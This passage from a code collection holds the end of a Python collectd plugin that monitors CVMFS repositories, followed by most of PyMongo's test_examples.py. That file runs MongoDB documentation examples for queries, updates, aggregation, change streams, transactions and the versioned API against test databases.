return process.get_memory_info()
else:
return process.memory_info()
def read(self, config):
self.debug("probing config: {0}".format((config)), config.verbose)
val = collectd.Values(plugin=PLUGIN_NAME)
for repo in config.repos:
val.plugin_instance = repo
val.interval = config.interval
repo_mountpoint = os.path.join(CVMFS_ROOT, repo)
try:
mounttime = self.read_mounttime(repo_mountpoint, config.mounttimeout)
if config.mounttime:
val.dispatch(type='mounttime', values=[mounttime], interval=config.interval)
val.dispatch(type='mountok', values=[1], interval=config.interval)
except Exception as e:
collectd.warning('cvmfs: failed to get MountTime for repo %s: %s' % (repo, e))
val.dispatch(type='mountok', values=[0], interval=config.interval)
if config.memory:
try:
repo_mem = self.read_memory(repo_mountpoint)
val.dispatch(type='memory', type_instance='rss', values=[repo_mem.rss], interval=config.interval)
val.dispatch(type='memory', type_instance='vms', values=[repo_mem.vms], interval=config.interval)
except Exception:
collectd.warning('cvmfs: failed to get Memory for repo %s' % repo)
for attribute in config.attributes:
attribute_name = "user.%s" % attribute
try:
val.dispatch(type=attribute, values=[float(xattr.getxattr(repo_mountpoint, attribute_name))], interval=config.interval)
except Exception:
collectd.warning('cvmfs: failed to inspect attribute "%s" in repo "%s"' % (attribute_name, repo_mountpoint))
def str2bool(self, boolstr):
if boolstr.lower() == 'true':
return True
elif boolstr.lower() == 'false':
return False
else:
raise TypeError('Boolean value expected.')
def configure(self, conf):
config = CvmfsProbeConfig()
for node in conf.children:
key = node.key.lower()
if key == 'repo':
config.repos += node.values
elif key == 'attribute':
config.attributes += node.values
elif key == 'memory':
try:
config.memory = self.str2bool(node.values[0])
except:
collectd.info("cvmfs: Memory value %s is not valid. It must be either True or False" % (node.values[0]))
elif key == 'mounttime':
try:
config.mounttime = self.str2bool(node.values[0])
except:
collectd.info("cvmfs: MountTime value %s is not valid. It must be either True or False" % (node.values[0]))
elif key == 'mounttimeout':
config.mounttimeout = int(node.values[0])
elif key == 'interval':
config.interval = int(node.values[0])
elif key == 'verbose':
config.verbose = self.str2bool(node.values[0])
if config.interval > 0:
collectd.register_read(callback=self.read, data=config, interval=config.interval, name=config.config_name)
else:
collectd.register_read(callback=self.read, data=config, name=config.config_name)
collectd.info("cvmfs: configured callback with config: {0}".format(config))
probe = CvmfsProbe()
collectd.register_config(probe.configure)
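# Minimal collectd configuration sketch for this plugin; the module, repository and
# attribute names below are assumptions, not a pinned setup:
#
#   <Plugin python>
#     Import "cvmfs"
#     <Module cvmfs>
#       Repo "atlas.cern.ch" "cms.cern.ch"
#       Attribute "usedfd"
#       Memory true
#       MountTime true
#       MountTimeout 5
#       Interval 60
#       Verbose false
#     </Module>
#   </Plugin>
#
# Each <Module> block is handed to CvmfsProbe.configure(), which registers one read
# callback per block using the keys handled above.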
|
test_examples.py
|
# Copyright 2017 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MongoDB documentation examples in Python."""
import datetime
import sys
import threading
sys.path[0:0] = [""]
import pymongo
from pymongo.errors import ConnectionFailure, OperationFailure
from pymongo.read_concern import ReadConcern
from pymongo.read_preferences import ReadPreference
from pymongo.server_api import ServerApi
from pymongo.write_concern import WriteConcern
from test import client_context, unittest, IntegrationTest
from test.utils import rs_client
class TestSampleShellCommands(IntegrationTest):
@classmethod
def setUpClass(cls):
super(TestSampleShellCommands, cls).setUpClass()
# Run once before any tests run.
cls.db.inventory.drop()
@classmethod
def tearDownClass(cls):
cls.client.drop_database("pymongo_test")
def tearDown(self):
# Run after every test.
self.db.inventory.drop()
def test_first_three_examples(self):
db = self.db
# Start Example 1
db.inventory.insert_one(
{"item": "canvas",
"qty": 100,
"tags": ["cotton"],
"size": {"h": 28, "w": 35.5, "uom": "cm"}})
# End Example 1
self.assertEqual(db.inventory.count_documents({}), 1)
# Start Example 2
cursor = db.inventory.find({"item": "canvas"})
# End Example 2
self.assertEqual(len(list(cursor)), 1)
# Start Example 3
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"tags": ["blank", "red"],
"size": {"h": 14, "w": 21, "uom": "cm"}},
{"item": "mat",
"qty": 85,
"tags": ["gray"],
"size": {"h": 27.9, "w": 35.5, "uom": "cm"}},
{"item": "mousepad",
"qty": 25,
"tags": ["gel", "blue"],
"size": {"h": 19, "w": 22.85, "uom": "cm"}}])
# End Example 3
self.assertEqual(db.inventory.count_documents({}), 4)
def test_query_top_level_fields(self):
db = self.db
# Start Example 6
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
{"item": "notebook",
"qty": 50,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "A"},
{"item": "paper",
"qty": 100,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "D"},
{"item": "planner",
"qty": 75, "size": {"h": 22.85, "w": 30, "uom": "cm"},
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"status": "A"}])
# End Example 6
self.assertEqual(db.inventory.count_documents({}), 5)
# Start Example 7
cursor = db.inventory.find({})
# End Example 7
self.assertEqual(len(list(cursor)), 5)
# Start Example 9
cursor = db.inventory.find({"status": "D"})
# End Example 9
self.assertEqual(len(list(cursor)), 2)
# Start Example 10
cursor = db.inventory.find({"status": {"$in": ["A", "D"]}})
# End Example 10
self.assertEqual(len(list(cursor)), 5)
# Start Example 11
cursor = db.inventory.find({"status": "A", "qty": {"$lt": 30}})
# End Example 11
self.assertEqual(len(list(cursor)), 1)
# Start Example 12
cursor = db.inventory.find(
{"$or": [{"status": "A"}, {"qty": {"$lt": 30}}]})
# End Example 12
self.assertEqual(len(list(cursor)), 3)
# Start Example 13
cursor = db.inventory.find({
"status": "A",
"$or": [{"qty": {"$lt": 30}}, {"item": {"$regex": "^p"}}]})
# End Example 13
self.assertEqual(len(list(cursor)), 2)
def test_query_embedded_documents(self):
db = self.db
# Start Example 14
# Subdocument key order matters in a few of these examples so we have
# to use bson.son.SON instead of a Python dict.
from bson.son import SON
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"size": SON([("h", 14), ("w", 21), ("uom", "cm")]),
"status": "A"},
{"item": "notebook",
"qty": 50,
"size": SON([("h", 8.5), ("w", 11), ("uom", "in")]),
"status": "A"},
{"item": "paper",
"qty": 100,
"size": SON([("h", 8.5), ("w", 11), ("uom", "in")]),
"status": "D"},
{"item": "planner",
"qty": 75,
"size": SON([("h", 22.85), ("w", 30), ("uom", "cm")]),
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": SON([("h", 10), ("w", 15.25), ("uom", "cm")]),
"status": "A"}])
# End Example 14
# Start Example 15
cursor = db.inventory.find(
{"size": SON([("h", 14), ("w", 21), ("uom", "cm")])})
# End Example 15
self.assertEqual(len(list(cursor)), 1)
# Start Example 16
cursor = db.inventory.find(
{"size": SON([("w", 21), ("h", 14), ("uom", "cm")])})
# End Example 16
self.assertEqual(len(list(cursor)), 0)
# Start Example 17
cursor = db.inventory.find({"size.uom": "in"})
# End Example 17
self.assertEqual(len(list(cursor)), 2)
# Start Example 18
cursor = db.inventory.find({"size.h": {"$lt": 15}})
# End Example 18
self.assertEqual(len(list(cursor)), 4)
# Start Example 19
cursor = db.inventory.find(
{"size.h": {"$lt": 15}, "size.uom": "in", "status": "D"})
# End Example 19
self.assertEqual(len(list(cursor)), 1)
def test_query_arrays(self):
db = self.db
# Start Example 20
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"tags": ["blank", "red"],
"dim_cm": [14, 21]},
{"item": "notebook",
"qty": 50,
"tags": ["red", "blank"],
"dim_cm": [14, 21]},
{"item": "paper",
"qty": 100,
"tags": ["red", "blank", "plain"],
"dim_cm": [14, 21]},
{"item": "planner",
"qty": 75,
"tags": ["blank", "red"],
"dim_cm": [22.85, 30]},
{"item": "postcard",
"qty": 45,
"tags": ["blue"],
"dim_cm": [10, 15.25]}])
# End Example 20
# Start Example 21
cursor = db.inventory.find({"tags": ["red", "blank"]})
# End Example 21
self.assertEqual(len(list(cursor)), 1)
# Start Example 22
cursor = db.inventory.find({"tags": {"$all": ["red", "blank"]}})
# End Example 22
self.assertEqual(len(list(cursor)), 4)
# Start Example 23
cursor = db.inventory.find({"tags": "red"})
# End Example 23
self.assertEqual(len(list(cursor)), 4)
# Start Example 24
cursor = db.inventory.find({"dim_cm": {"$gt": 25}})
# End Example 24
self.assertEqual(len(list(cursor)), 1)
# Start Example 25
cursor = db.inventory.find({"dim_cm": {"$gt": 15, "$lt": 20}})
# End Example 25
self.assertEqual(len(list(cursor)), 4)
# Start Example 26
cursor = db.inventory.find(
{"dim_cm": {"$elemMatch": {"$gt": 22, "$lt": 30}}})
# End Example 26
self.assertEqual(len(list(cursor)), 1)
# Start Example 27
cursor = db.inventory.find({"dim_cm.1": {"$gt": 25}})
# End Example 27
self.assertEqual(len(list(cursor)), 1)
# Start Example 28
cursor = db.inventory.find({"tags": {"$size": 3}})
# End Example 28
self.assertEqual(len(list(cursor)), 1)
def test_query_array_of_documents(self):
db = self.db
# Start Example 29
# Subdocument key order matters in a few of these examples so we have
# to use bson.son.SON instead of a Python dict.
from bson.son import SON
db.inventory.insert_many([
{"item": "journal",
"instock": [
SON([("warehouse", "A"), ("qty", 5)]),
SON([("warehouse", "C"), ("qty", 15)])]},
{"item": "notebook",
"instock": [
SON([("warehouse", "C"), ("qty", 5)])]},
{"item": "paper",
"instock": [
SON([("warehouse", "A"), ("qty", 60)]),
SON([("warehouse", "B"), ("qty", 15)])]},
{"item": "planner",
"instock": [
SON([("warehouse", "A"), ("qty", 40)]),
SON([("warehouse", "B"), ("qty", 5)])]},
{"item": "postcard",
"instock": [
SON([("warehouse", "B"), ("qty", 15)]),
SON([("warehouse", "C"), ("qty", 35)])]}])
# End Example 29
# Start Example 30
cursor = db.inventory.find(
{"instock": SON([("warehouse", "A"), ("qty", 5)])})
# End Example 30
self.assertEqual(len(list(cursor)), 1)
# Start Example 31
cursor = db.inventory.find(
{"instock": SON([("qty", 5), ("warehouse", "A")])})
# End Example 31
self.assertEqual(len(list(cursor)), 0)
# Start Example 32
cursor = db.inventory.find({'instock.0.qty': {"$lte": 20}})
# End Example 32
self.assertEqual(len(list(cursor)), 3)
# Start Example 33
cursor = db.inventory.find({'instock.qty': {"$lte": 20}})
# End Example 33
self.assertEqual(len(list(cursor)), 5)
# Start Example 34
cursor = db.inventory.find(
{"instock": {"$elemMatch": {"qty": 5, "warehouse": "A"}}})
# End Example 34
self.assertEqual(len(list(cursor)), 1)
# Start Example 35
cursor = db.inventory.find(
{"instock": {"$elemMatch": {"qty": {"$gt": 10, "$lte": 20}}}})
# End Example 35
self.assertEqual(len(list(cursor)), 3)
# Start Example 36
cursor = db.inventory.find({"instock.qty": {"$gt": 10, "$lte": 20}})
# End Example 36
self.assertEqual(len(list(cursor)), 4)
# Start Example 37
cursor = db.inventory.find(
{"instock.qty": 5, "instock.warehouse": "A"})
# End Example 37
self.assertEqual(len(list(cursor)), 2)
def test_query_null(self):
db = self.db
# Start Example 38
db.inventory.insert_many([{"_id": 1, "item": None}, {"_id": 2}])
# End Example 38
# Start Example 39
cursor = db.inventory.find({"item": None})
# End Example 39
self.assertEqual(len(list(cursor)), 2)
# Start Example 40
cursor = db.inventory.find({"item": {"$type": 10}})
# End Example 40
self.assertEqual(len(list(cursor)), 1)
# Start Example 41
cursor = db.inventory.find({"item": {"$exists": False}})
# End Example 41
self.assertEqual(len(list(cursor)), 1)
def test_projection(self):
db = self.db
# Start Example 42
db.inventory.insert_many([
{"item": "journal",
"status": "A",
"size": {"h": 14, "w": 21, "uom": "cm"},
"instock": [{"warehouse": "A", "qty": 5}]},
{"item": "notebook",
"status": "A",
"size": {"h": 8.5, "w": 11, "uom": "in"},
"instock": [{"warehouse": "C", "qty": 5}]},
{"item": "paper",
"status": "D",
"size": {"h": 8.5, "w": 11, "uom": "in"},
"instock": [{"warehouse": "A", "qty": 60}]},
{"item": "planner",
"status": "D",
"size": {"h": 22.85, "w": 30, "uom": "cm"},
"instock": [{"warehouse": "A", "qty": 40}]},
{"item": "postcard",
"status": "A",
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"instock": [
{"warehouse": "B", "qty": 15},
{"warehouse": "C", "qty": 35}]}])
# End Example 42
# Start Example 43
cursor = db.inventory.find({"status": "A"})
# End Example 43
self.assertEqual(len(list(cursor)), 3)
# Start Example 44
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1})
# End Example 44
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertFalse("instock" in doc)
# Start Example 45
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1, "_id": 0})
# End Example 45
for doc in cursor:
self.assertFalse("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertFalse("instock" in doc)
# Start Example 46
cursor = db.inventory.find(
{"status": "A"}, {"status": 0, "instock": 0})
# End Example 46
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertFalse("status" in doc)
self.assertTrue("size" in doc)
self.assertFalse("instock" in doc)
# Start Example 47
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1, "size.uom": 1})
# End Example 47
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertTrue("size" in doc)
self.assertFalse("instock" in doc)
size = doc['size']
self.assertTrue('uom' in size)
self.assertFalse('h' in size)
self.assertFalse('w' in size)
# Start Example 48
cursor = db.inventory.find({"status": "A"}, {"size.uom": 0})
# End Example 48
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertTrue("size" in doc)
self.assertTrue("instock" in doc)
size = doc['size']
self.assertFalse('uom' in size)
self.assertTrue('h' in size)
self.assertTrue('w' in size)
# Start Example 49
cursor = db.inventory.find(
{"status": "A"}, {"item": 1, "status": 1, "instock.qty": 1})
# End Example 49
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertTrue("instock" in doc)
for subdoc in doc['instock']:
self.assertFalse('warehouse' in subdoc)
self.assertTrue('qty' in subdoc)
# Start Example 50
cursor = db.inventory.find(
{"status": "A"},
{"item": 1, "status": 1, "instock": {"$slice": -1}})
# End Example 50
for doc in cursor:
self.assertTrue("_id" in doc)
self.assertTrue("item" in doc)
self.assertTrue("status" in doc)
self.assertFalse("size" in doc)
self.assertTrue("instock" in doc)
self.assertEqual(len(doc["instock"]), 1)
def test_update_and_replace(self):
db = self.db
# Start Example 51
db.inventory.insert_many([
{"item": "canvas",
"qty": 100,
"size": {"h": 28, "w": 35.5, "uom": "cm"},
"status": "A"},
{"item": "journal",
"qty": 25,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
{"item": "mat",
"qty": 85,
"size": {"h": 27.9, "w": 35.5, "uom": "cm"},
"status": "A"},
{"item": "mousepad",
"qty": 25,
"size": {"h": 19, "w": 22.85, "uom": "cm"},
"status": "P"},
{"item": "notebook",
"qty": 50,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "P"},
{"item": "paper",
"qty": 100,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "D"},
{"item": "planner",
"qty": 75,
"size": {"h": 22.85, "w": 30, "uom": "cm"},
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"status": "A"},
{"item": "sketchbook",
"qty": 80,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
{"item": "sketch pad",
"qty": 95,
"size": {"h": 22.85, "w": 30.5, "uom": "cm"},
"status": "A"}])
# End Example 51
# Start Example 52
db.inventory.update_one(
{"item": "paper"},
{"$set": {"size.uom": "cm", "status": "P"},
"$currentDate": {"lastModified": True}})
# End Example 52
for doc in db.inventory.find({"item": "paper"}):
self.assertEqual(doc["size"]["uom"], "cm")
self.assertEqual(doc["status"], "P")
self.assertTrue("lastModified" in doc)
# Start Example 53
db.inventory.update_many(
{"qty": {"$lt": 50}},
{"$set": {"size.uom": "in", "status": "P"},
"$currentDate": {"lastModified": True}})
# End Example 53
for doc in db.inventory.find({"qty": {"$lt": 50}}):
self.assertEqual(doc["size"]["uom"], "in")
self.assertEqual(doc["status"], "P")
self.assertTrue("lastModified" in doc)
# Start Example 54
db.inventory.replace_one(
{"item": "paper"},
{"item": "paper",
"instock": [
{"warehouse": "A", "qty": 60},
{"warehouse": "B", "qty": 40}]})
# End Example 54
for doc in db.inventory.find({"item": "paper"}, {"_id": 0}):
self.assertEqual(len(doc.keys()), 2)
self.assertTrue("item" in doc)
self.assertTrue("instock" in doc)
self.assertEqual(len(doc["instock"]), 2)
def test_delete(self):
db = self.db
# Start Example 55
db.inventory.insert_many([
{"item": "journal",
"qty": 25,
"size": {"h": 14, "w": 21, "uom": "cm"},
"status": "A"},
{"item": "notebook",
"qty": 50,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "P"},
{"item": "paper",
"qty": 100,
"size": {"h": 8.5, "w": 11, "uom": "in"},
"status": "D"},
{"item": "planner",
"qty": 75,
"size": {"h": 22.85, "w": 30, "uom": "cm"},
"status": "D"},
{"item": "postcard",
"qty": 45,
"size": {"h": 10, "w": 15.25, "uom": "cm"},
"status": "A"}])
# End Example 55
self.assertEqual(db.inventory.count_documents({}), 5)
# Start Example 57
db.inventory.delete_many({"status": "A"})
# End Example 57
self.assertEqual(db.inventory.count_documents({}), 3)
# Start Example 58
db.inventory.delete_one({"status": "D"})
# End Example 58
self.assertEqual(db.inventory.count_documents({}), 2)
# Start Example 56
db.inventory.delete_many({})
# End Example 56
self.assertEqual(db.inventory.count_documents({}), 0)
@client_context.require_replica_set
@client_context.require_no_mmap
def test_change_streams(self):
db = self.db
done = False
def insert_docs():
while not done:
db.inventory.insert_one({"username": "alice"})
db.inventory.delete_one({"username": "alice"})
t = threading.Thread(target=insert_docs)
t.start()
try:
# 1. The database for reactive, real-time applications
# Start Changestream Example 1
cursor = db.inventory.watch()
document = next(cursor)
# End Changestream Example 1
# Start Changestream Example 2
cursor = db.inventory.watch(full_document='updateLookup')
document = next(cursor)
# End Changestream Example 2
# Start Changestream Example 3
resume_token = cursor.resume_token
cursor = db.inventory.watch(resume_after=resume_token)
document = next(cursor)
# End Changestream Example 3
# Start Changestream Example 4
pipeline = [
{'$match': {'fullDocument.username': 'alice'}},
{'$addFields': {'newField': 'this is an added field!'}}
]
cursor = db.inventory.watch(pipeline=pipeline)
document = next(cursor)
# End Changestream Example 4
finally:
done = True
t.join()
def test_aggregate_examples(self):
db = self.db
# Start Aggregation Example 1
db.sales.aggregate([
{"$match": {"items.fruit": "banana"}},
{"$sort": {"date": 1}}
])
# End Aggregation Example 1
# Start Aggregation Example 2
db.sales.aggregate([
{"$unwind": "$items"},
{"$match": {"items.fruit": "banana"}},
{"$group": {
"_id": {"day": {"$dayOfWeek": "$date"}},
"count": {"$sum": "$items.quantity"}}
},
{"$project": {
"dayOfWeek": "$_id.day",
"numberSold": "$count",
"_id": 0}
},
{"$sort": {"numberSold": 1}}
])
# End Aggregation Example 2
# Start Aggregation Example 3
db.sales.aggregate([
{"$unwind": "$items"},
{"$group": {
"_id": {"day": {"$dayOfWeek": "$date"}},
"items_sold": {"$sum": "$items.quantity"},
"revenue": {
"$sum": {
"$multiply": [
"$items.quantity", "$items.price"]
}
}
}
},
{"$project": {
"day": "$_id.day",
"revenue": 1,
"items_sold": 1,
"discount": {
"$cond": {
"if": {"$lte": ["$revenue", 250]},
"then": 25,
"else": 0
}
}
}
}
])
# End Aggregation Example 3
# Start Aggregation Example 4
db.air_alliances.aggregate([
{"$lookup": {
"from": "air_airlines",
"let": {"constituents": "$airlines"},
"pipeline": [
{"$match": {"$expr": {"$in": ["$name", "$$constituents"]}}}
],
"as": "airlines"
}
},
{"$project": {
"_id": 0,
"name": 1,
"airlines": {
"$filter": {
"input": "$airlines",
"as": "airline",
"cond": {"$eq": ["$$airline.country", "Canada"]}
}
}
}
}
])
# End Aggregation Example 4
def test_commands(self):
db = self.db
db.restaurants.insert_one({})
# Start runCommand Example 1
db.command("buildInfo")
# End runCommand Example 1
# Start runCommand Example 2
db.command("collStats", "restaurants")
# End runCommand Example 2
def test_index_management(self):
db = self.db
# Start Index Example 1
db.records.create_index("score")
# End Index Example 1
        # Start Index Example 2
db.restaurants.create_index(
[("cuisine", pymongo.ASCENDING), ("name", pymongo.ASCENDING)],
partialFilterExpression={"rating": {"$gt": 5}}
)
        # End Index Example 2
@client_context.require_replica_set
def test_misc(self):
# Marketing examples
client = self.client
self.addCleanup(client.drop_database, "test")
self.addCleanup(client.drop_database, "my_database")
# 2. Tunable consistency controls
collection = client.my_database.my_collection
with client.start_session() as session:
collection.insert_one({'_id': 1}, session=session)
collection.update_one(
{'_id': 1}, {"$set": {"a": 1}}, session=session)
for doc in collection.find({}, session=session):
pass
# 3. Exploiting the power of arrays
collection = client.test.array_updates_test
collection.update_one(
{'_id': 1},
{"$set": {"a.$[i].b": 2}},
array_filters=[{"i.b": 0}])
class TestTransactionExamples(IntegrationTest):
@client_context.require_transactions
def test_transactions(self):
# Transaction examples
client = self.client
self.addCleanup(client.drop_database, "hr")
self.addCleanup(client.drop_database, "reporting")
employees = client.hr.employees
events = client.reporting.events
employees.insert_one({"employee": 3, "status": "Active"})
events.insert_one(
{"employee": 3, "status": {"new": "Active", "old": None}})
# Start Transactions Intro Example 1
def update_employee_info(session):
employees_coll = session.client.hr.employees
events_coll = session.client.reporting.events
with session.start_transaction(
read_concern=ReadConcern("snapshot"),
write_concern=WriteConcern(w="majority")):
employees_coll.update_one(
{"employee": 3}, {"$set": {"status": "Inactive"}},
session=session)
events_coll.insert_one(
{"employee": 3, "status": {
"new": "Inactive", "old": "Active"}},
session=session)
while True:
try:
# Commit uses write concern set at transaction start.
session.commit_transaction()
print("Transaction committed.")
break
except (ConnectionFailure, OperationFailure) as exc:
# Can retry commit
if exc.has_error_label(
"UnknownTransactionCommitResult"):
print("UnknownTransactionCommitResult, retrying "
"commit operation ...")
continue
else:
print("Error during commit ...")
raise
# End Transactions Intro Example 1
with client.start_session() as session:
update_employee_info(session)
employee = employees.find_one({"employee": 3})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Inactive')
# Start Transactions Retry Example 1
def run_transaction_with_retry(txn_func, session):
while True:
try:
txn_func(session) # performs transaction
break
except (ConnectionFailure, OperationFailure) as exc:
print("Transaction aborted. Caught exception during "
"transaction.")
# If transient error, retry the whole transaction
if exc.has_error_label("TransientTransactionError"):
print("TransientTransactionError, retrying"
"transaction ...")
continue
else:
raise
# End Transactions Retry Example 1
with client.start_session() as session:
run_transaction_with_retry(update_employee_info, session)
employee = employees.find_one({"employee": 3})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Inactive')
# Start Transactions Retry Example 2
def commit_with_retry(session):
while True:
try:
# Commit uses write concern set at transaction start.
session.commit_transaction()
print("Transaction committed.")
break
except (ConnectionFailure, OperationFailure) as exc:
# Can retry commit
if exc.has_error_label("UnknownTransactionCommitResult"):
print("UnknownTransactionCommitResult, retrying "
"commit operation ...")
continue
else:
print("Error during commit ...")
raise
# End Transactions Retry Example 2
# Test commit_with_retry from the previous examples
def _insert_employee_retry_commit(session):
with session.start_transaction():
employees.insert_one(
{"employee": 4, "status": "Active"},
session=session)
events.insert_one(
{"employee": 4, "status": {"new": "Active", "old": None}},
session=session)
commit_with_retry(session)
with client.start_session() as session:
run_transaction_with_retry(_insert_employee_retry_commit, session)
employee = employees.find_one({"employee": 4})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Active')
# Start Transactions Retry Example 3
def run_transaction_with_retry(txn_func, session):
while True:
try:
txn_func(session) # performs transaction
break
except (ConnectionFailure, OperationFailure) as exc:
# If transient error, retry the whole transaction
if exc.has_error_label("TransientTransactionError"):
print("TransientTransactionError, retrying "
"transaction ...")
continue
else:
raise
def commit_with_retry(session):
while True:
try:
# Commit uses write concern set at transaction start.
session.commit_transaction()
print("Transaction committed.")
break
except (ConnectionFailure, OperationFailure) as exc:
# Can retry commit
if exc.has_error_label("UnknownTransactionCommitResult"):
print("UnknownTransactionCommitResult, retrying "
"commit operation ...")
continue
else:
print("Error during commit ...")
raise
        # Updates two collections in a transaction.
def update_employee_info(session):
employees_coll = session.client.hr.employees
events_coll = session.client.reporting.events
with session.start_transaction(
read_concern=ReadConcern("snapshot"),
write_concern=WriteConcern(w="majority"),
read_preference=ReadPreference.PRIMARY):
employees_coll.update_one(
{"employee": 3}, {"$set": {"status": "Inactive"}},
session=session)
events_coll.insert_one(
{"employee": 3, "status": {
"new": "Inactive", "old": "Active"}},
session=session)
commit_with_retry(session)
# Start a session.
with client.start_session() as session:
try:
run_transaction_with_retry(update_employee_info, session)
except Exception as exc:
# Do something with error.
raise
# End Transactions Retry Example 3
employee = employees.find_one({"employee": 3})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Inactive')
MongoClient = lambda _: rs_client()
uriString = None
# Start Transactions withTxn API Example 1
# For a replica set, include the replica set name and a seedlist of the members in the URI string; e.g.
# uriString = 'mongodb://mongodb0.example.com:27017,mongodb1.example.com:27017/?replicaSet=myRepl'
# For a sharded cluster, connect to the mongos instances; e.g.
# uriString = 'mongodb://mongos0.example.com:27017,mongos1.example.com:27017/'
client = MongoClient(uriString)
wc_majority = WriteConcern("majority", wtimeout=1000)
# Prereq: Create collections.
client.get_database(
"mydb1", write_concern=wc_majority).foo.insert_one({'abc': 0})
client.get_database(
"mydb2", write_concern=wc_majority).bar.insert_one({'xyz': 0})
# Step 1: Define the callback that specifies the sequence of operations to perform inside the transactions.
def callback(session):
collection_one = session.client.mydb1.foo
collection_two = session.client.mydb2.bar
            # Important: You must pass the session to the operations.
collection_one.insert_one({'abc': 1}, session=session)
collection_two.insert_one({'xyz': 999}, session=session)
# Step 2: Start a client session.
with client.start_session() as session:
# Step 3: Use with_transaction to start a transaction, execute the callback, and commit (or abort on error).
session.with_transaction(
callback, read_concern=ReadConcern('local'),
write_concern=wc_majority,
read_preference=ReadPreference.PRIMARY)
# End Transactions withTxn API Example 1
class TestCausalConsistencyExamples(IntegrationTest):
@client_context.require_secondaries_count(1)
@client_context.require_no_mmap
def test_causal_consistency(self):
# Causal consistency examples
client = self.client
self.addCleanup(client.drop_database, 'test')
client.test.drop_collection('items')
client.test.items.insert_one({
'sku': "111", 'name': 'Peanuts',
'start':datetime.datetime.today()})
# Start Causal Consistency Example 1
with client.start_session(causal_consistency=True) as s1:
current_date = datetime.datetime.today()
items = client.get_database(
'test', read_concern=ReadConcern('majority'),
write_concern=WriteConcern('majority', wtimeout=1000)).items
items.update_one(
{'sku': "111", 'end': None},
{'$set': {'end': current_date}}, session=s1)
items.insert_one(
{'sku': "nuts-111", 'name': "Pecans",
'start': current_date}, session=s1)
# End Causal Consistency Example 1
# Start Causal Consistency Example 2
with client.start_session(causal_consistency=True) as s2:
s2.advance_cluster_time(s1.cluster_time)
s2.advance_operation_time(s1.operation_time)
items = client.get_database(
'test', read_preference=ReadPreference.SECONDARY,
read_concern=ReadConcern('majority'),
write_concern=WriteConcern('majority', wtimeout=1000)).items
for item in items.find({'end': None}, session=s2):
print(item)
# End Causal Consistency Example 2
class TestVersionedApiExamples(IntegrationTest):
@client_context.require_version_min(4, 7)
def test_versioned_api(self):
# Versioned API examples
MongoClient = lambda _, server_api: rs_client(
server_api=server_api, connect=False)
uri = None
# Start Versioned API Example 1
from pymongo.server_api import ServerApi
client = MongoClient(uri, server_api=ServerApi("1"))
# End Versioned API Example 1
# Start Versioned API Example 2
client = MongoClient(
uri, server_api=ServerApi("1", strict=True))
# End Versioned API Example 2
# Start Versioned API Example 3
client = MongoClient(
uri, server_api=ServerApi("1", strict=False))
# End Versioned API Example 3
# Start Versioned API Example 4
client = MongoClient(
uri, server_api=ServerApi("1", deprecation_errors=True))
# End Versioned API Example 4
@client_context.require_version_min(4, 7)
def test_versioned_api_migration(self):
# SERVER-58785
if (client_context.is_topology_type(["sharded"]) and
not client_context.version.at_least(5, 0, 2)):
self.skipTest("This test needs MongoDB 5.0.2 or newer")
client = rs_client(server_api=ServerApi("1", strict=True))
client.db.sales.drop()
# Start Versioned API Example 5
def strptime(s):
return datetime.datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")
client.db.sales.insert_many([
{"_id": 1, "item": "abc", "price": 10, "quantity": 2, "date": strptime("2021-01-01T08:00:00Z")},
{"_id": 2, "item": "jkl", "price": 20, "quantity": 1, "date": strptime("2021-02-03T09:00:00Z")},
{"_id": 3, "item": "xyz", "price": 5, "quantity": 5, "date": strptime("2021-02-03T09:05:00Z")},
{"_id": 4, "item": "abc", "price": 10, "quantity": 10, "date": strptime("2021-02-15T08:00:00Z")},
{"_id": 5, "item": "xyz", "price": 5, "quantity": 10, "date": strptime("2021-02-15T09:05:00Z")},
{"_id": 6, "item": "xyz", "price": 5, "quantity": 5, "date": strptime("2021-02-15T12:05:10Z")},
{"_id": 7, "item": "xyz", "price": 5, "quantity": 10, "date": strptime("2021-02-15T14:12:12Z")},
